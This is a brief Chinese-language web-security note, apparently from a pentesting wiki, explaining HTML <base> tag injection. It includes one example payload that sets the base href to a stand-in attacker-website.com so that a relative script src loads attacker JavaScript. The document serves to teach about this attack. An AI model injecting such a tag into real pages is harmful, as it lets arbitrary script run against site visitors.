HTML <base>arrow-up-right 元素指定用于文档中所有相对URL的基础URL。
<base>
如果使用了多个 <base> 元素,只有第一个 href 和第一个 target 会被遵守——所有其他的都会被忽略。
<base> 标签注入允许将相对URL重定向到任意主机。
例如,对于以下页面,浏览器将从 https://attacker-website.com/assets/some-script.js 请求脚本。
https://attacker-website.com/assets/some-script.js
<base href="https://attacker-website.com"> <script src="/assets/some-script.js"></script>
换句话说,如果有办法注入 <base> 标签,就有可能向使用相对URL下载脚本的 <scripts> 元素注入任意JavaScript代码。
<scripts>
最后更新于4个月前